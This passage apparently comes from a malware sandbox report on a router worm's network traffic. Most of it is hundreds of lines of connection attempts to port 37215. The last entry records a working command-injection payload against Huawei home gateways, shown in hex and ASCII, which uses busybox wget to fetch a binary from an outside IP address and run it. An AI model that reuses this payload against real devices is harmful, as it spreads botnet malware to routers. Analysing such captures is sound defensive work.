                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 147.243.186.184:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.23.79.168:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 4.233.70.157:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.153.132.1:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.78.160.209:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.76.72.141:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.44.128.22:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.73.191.137:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.62.204.105:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.34.116.65:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 79.221.186.87:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.176.42.51:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.215.35.225:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.170.198.219:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 166.131.117.210:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.81.88.163:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.128.179.133:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.72.19.81:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 106.164.31.66:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.152.3.186:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.161.146.21:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 86.73.61.228:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.121.209.173:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 81.129.201.221:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.48.153.192:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.163.141.149:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 166.198.235.186:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.142.248.92:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.255.58.149:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.56.75.65:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.0.198.185:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.38.91.38:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.98.191.155:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.194.161.7:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 201.92.140.128:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.167.28.37:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.101.184.21:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.253.148.46:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.24.76.122:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.186.150.240:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.92.71.63:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.80.129.226:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.206.185.92:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 161.38.181.35:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 135.120.57.13:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.5.43.50:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.76.194.10:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.65.209.229:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.216.114.137:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.14.103.233:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.82.18.225:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.167.48.66:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.60.142.186:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.101.194.244:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 102.251.204.248:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.75.114.16:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.238.120.136:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 66.162.43.92:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.16.49.186:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 201.152.116.100:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.87.147.209:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.245.216.90:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.3.18.168:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 171.50.22.189:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.3.171.233:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.41.24.240:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.214.58.228:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.134.19.226:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 106.163.24.67:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.196.109.18:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 47.97.1.120:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.211.103.46:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 25.214.90.242:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.130.234.5:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 13.11.209.38:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 186.218.73.143:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.0.104.55:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.85.145.190:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 13.140.3.30:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.203.112.214:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.109.139.145:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.181.61.203:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.251.115.138:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 124.98.64.143:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.216.223.111:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.196.114.19:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.173.191.94:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.202.4.215:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 17.201.161.174:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.188.202.67:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.231.54.179:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.134.194.199:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 155.83.179.167:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.73.28.132:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.189.201.199:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.131.167.65:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.127.2.167:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.112.234.120:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 206.111.89.168:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.109.41.78:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.199.226.62:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 53.189.230.162:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.130.32.32:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.226.125.170:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 111.128.254.243:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 96.237.229.77:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.42.102.15:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.46.229.201:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 113.54.226.55:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.208.121.63:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.159.100.64:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.27.42.36:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 125.187.54.161:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 201.77.191.220:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.194.80.112:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 158.202.44.85:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.187.28.139:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.228.184.18:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.223.147.97:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 97.164.167.71:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.161.158.114:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.208.219.66:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.134.53.23:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 138.222.13.23:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.92.98.139:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 208.163.211.194:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 186.175.55.123:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 111.54.204.83:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.146.103.69:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 148.173.115.127:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.24.255.238:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 158.252.74.72:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.141.31.200:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.7.240.143:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.162.97.216:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.40.112.5:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.45.129.180:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.116.122.222:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.83.108.60:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.24.3.143:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.219.225.208:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 163.147.67.198:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.2.61.193:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.135.24.152:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.22.114.23:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.27.207.15:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.65.30.63:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.97.76.236:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.44.8.101:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.89.204.130:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 204.222.36.30:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.0.160.64:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.29.156.173:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 80.51.248.78:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.191.126.49:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.119.24.204:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 92.15.157.140:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.84.228.56:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.10.21.82:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 223.237.144.107:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 148.130.233.114:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.6.6.51:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 47.12.204.48:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.227.178.188:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.191.96.62:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.214.112.116:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.30.83.133:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 186.117.96.192:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.106.246.220:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.180.32.171:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.96.87.175:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.159.121.27:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.196.49.203:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.10.2.135:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.36.63.169:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.65.5.173:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.78.46.122:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.123.196.82:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.84.139.239:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.26.84.171:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.243.213.172:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.140.240.90:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.143.159.112:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.162.183.168:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.78.27.47:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.153.225.113:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.209.43.163:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.189.103.162:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.150.38.89:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 60.255.171.214:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.202.157.249:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.192.140.72:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.30.70.201:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 208.222.36.161:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.42.117.46:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.183.43.165:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 156.88.100.78:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.240.173.113:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.13.244.218:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.131.198.174:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.141.2.184:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.225.13.188:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.11.131.75:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.98.156.194:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.174.24.50:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.205.52.32:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.35.184.239:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.70.17.169:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.114.159.135:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.248.92.146:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 193.90.236.31:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.68.154.195:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.91.55.160:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.223.186.148:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.58.77.134:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 64.233.186.114:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.6.118.223:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.199.203.160:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.202.56.166:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.139.84.207:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.104.99.236:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.196.24.105:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.89.8.88:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.177.90.200:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.151.238.19:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.40.203.209:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.78.61.164:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.48.20.189:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.216.24.29:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 167.246.192.174:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.82.85.50:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.135.237.169:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.63.119.7:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.172.48.160:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.92.240.108:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.177.74.36:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 174.57.247.41:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 111.127.88.81:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.10.84.37:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.152.147.144:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.228.116.104:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.122.20.167:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 210.82.6.144:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.147.207.103:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.216.96.177:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.192.73.134:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.136.176.214:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.45.48.143:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.21.133.128:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.189.0.252:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 131.96.178.234:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.99.7.95:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 202.93.168.166:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 68.236.183.218:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.118.191.63:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 68.47.8.118:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.245.66.230:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.204.16.251:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.117.88.201:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.252.42.216:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.87.188.102:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.58.1.141:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.185.62.32:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.163.233.105:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.151.177.55:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.146.34.35:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.98.233.76:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.32.224.59:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.36.1.106:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.54.153.61:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 4.218.38.42:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 54.184.127.174:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.247.246.253:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 89.203.183.43:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 147.80.83.72:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.135.200.202:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.195.183.110:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.60.128.188:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.11.124.121:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.58.178.25:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.42.249.116:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.176.88.57:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.208.234.5:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.193.197.189:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.237.225.40:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.38.47.145:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 100.7.91.55:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 112.196.21.182:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 67.160.5.207:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.204.196.42:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 114.194.190.186:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.241.48.3:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.209.64.71:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 169.26.157.237:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.177.160.170:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.167.244.42:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.77.41.213:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 138.220.81.92:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.27.246.118:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.110.4.98:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.117.176.121:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.185.212.87:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.99.6.135:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.223.143.186:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.51.203.47:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.67.150.45:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.161.195.224:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.252.46.120:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 222.43.177.243:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 223.46.8.125:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 198.66.27.84:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 140.195.29.212:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.116.120.99:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.252.34.236:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.16.113.47:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.35.52.59:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.18.236.94:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.20.249.242:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 189.30.98.152:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.212.22.77:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.237.255.18:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.233.38.50:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.5.160.224:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.219.47.191:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.173.150.154:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.146.206.61:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.146.189.111:37215
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
